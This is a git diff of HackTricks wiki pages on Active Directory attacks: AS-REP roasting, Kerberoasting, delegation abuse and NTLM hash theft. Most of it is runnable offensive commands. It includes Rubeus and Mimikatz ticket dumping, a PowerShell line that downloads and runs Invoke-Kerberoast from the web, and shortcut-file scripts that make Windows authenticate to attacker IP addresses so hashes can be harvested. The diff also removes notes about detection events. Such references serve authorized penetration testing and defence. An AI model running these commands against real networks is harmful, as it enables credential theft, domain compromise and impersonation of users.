diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md
index 86d9f8af..aefee360 100644
--- a/windows-hardening/active-directory-methodology/asreproast.md
+++ b/windows-hardening/active-directory-methodology/asreproast.md
@@ -50,15 +50,11 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
{% code title="Using Windows" %}
```bash
-.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
-{% hint style="warning" %}
-AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
-{% endhint %}
-
### Cracking
```
diff --git a/windows-hardening/active-directory-methodology/constrained-delegation.md b/windows-hardening/active-directory-methodology/constrained-delegation.md
index c46a2a0c..4af76889 100644
--- a/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -1,4 +1,4 @@
-
+# Constrained Delegation
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Constrained Delegation
+## Constrained Delegation
Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine.
@@ -27,15 +26,15 @@ Using this a Domain admin can allow 3rd parties to impersonate a user or compute
**Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\
-Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\
+Also, you **won't only have access to the service that the user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\
Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
-{% code title="Enumerate from Powerview" %}
-```bash
-Get-DomainUser -TrustedToAuth
-Get-DomainComputer -TrustedToAuth
-```
-{% endcode %}
+# Powerview
+Get-DomainUser -TrustedToAuth
+Get-DomainComputer -TrustedToAuth
+
+#ADSearch
+ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
{% code title="Using kekeo.exe + Mimikatz.exe" %}
```bash
@@ -63,7 +62,7 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
```
{% endcode %}
-## Mitigation
+### Mitigation
* Disable kerberos delegation where possible
* Limit DA/Admin logins to specific services
@@ -71,7 +70,6 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
-
Support HackTricks and get benefits!
@@ -87,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md
index 64017157..b512a5ad 100644
--- a/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/windows-hardening/active-directory-methodology/kerberoast.md
@@ -1,4 +1,4 @@
-# Kerberoast
+
@@ -16,7 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Kerberoast
+
+# Kerberoast
The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
@@ -49,24 +50,14 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f
{% code title="From Windows" %}
```bash
-# Powerview
Request-SPNTicket -SPN "" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
-
-# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
-.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
-
-# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% endcode %}
-{% hint style="warning" %}
-When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
-{% endhint %}
-
-### Cracking
+## Cracking
```
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@@ -74,7 +65,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
-### Persistence
+## Persistence
If you have **enough permissions** over a user you can **make it kerberoastable**:
@@ -86,7 +77,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate `
-### Mitigation
+## Mitigation
Kerberoast is very stealthy if exploitable
@@ -107,6 +98,7 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
+
Support HackTricks and get benefits!
@@ -122,3 +114,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index 747f7621..c70a7e4d 100644
--- a/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -1,4 +1,4 @@
-
+# Unconstrained Delegation
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Unconstrained delegation
+## Unconstrained delegation
This a feature that a Domain Administrator can set to any **Computer** inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to **dump the tickets and impersonate the users** on any machine.
@@ -25,19 +24,25 @@ So if a domain admin logins inside a Computer with "Unconstrained Delegation" fe
You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:
-```bash
+# List unconstrained computers
+## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
-#Export tickets with Mimikatz
-privilege::debug
+## ADSearch
+ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
+
+# Export tickets with Mimikatz
+privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
-```
+
+# Monitor logins and export new tickets
+.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs
Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
-## **Automatically compromising a Print server**
+### **Automatically compromising a Print server**
If an attacker is able to **compromise a computer allowed for "Unconstrained Delegation"**, he could **trick** a **Print server** to **automatically login** against it **saving a TGT** in the memory of the server.\
Then, the attacker could perform a **Pass the Ticket attack to impersonate** the user Print server computer account.
@@ -45,18 +50,17 @@ Then, the attacker could perform a **Pass the Ticket attack to impersonate** the
To make a print server login against any machine you can use [**SpoolSample**](https://github.com/leechristensen/SpoolSample):
```bash
-.\SpoolSample.exe printmachine unconstrinedmachine
+.\SpoolSample.exe
```
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
-## Mitigation
+### Mitigation
* Limit DA/Admin logins to specific services
* Set "Account is sensitive and cannot be delegated" for privileged accounts.
-
Support HackTricks and get benefits!
@@ -72,5 +76,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
index 64f2bbc5..97a9256c 100644
--- a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
+++ b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
@@ -237,7 +237,7 @@ IconIndex=1337
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
-```
+```powershell
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
@@ -254,7 +254,7 @@ sc.Save
The Powershell version.
-```
+```powershell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
@@ -269,7 +269,7 @@ $lnk.Save()
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
-```
+```bash
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
@@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa
IE will resolve UNC paths. For example
-```
+```html
```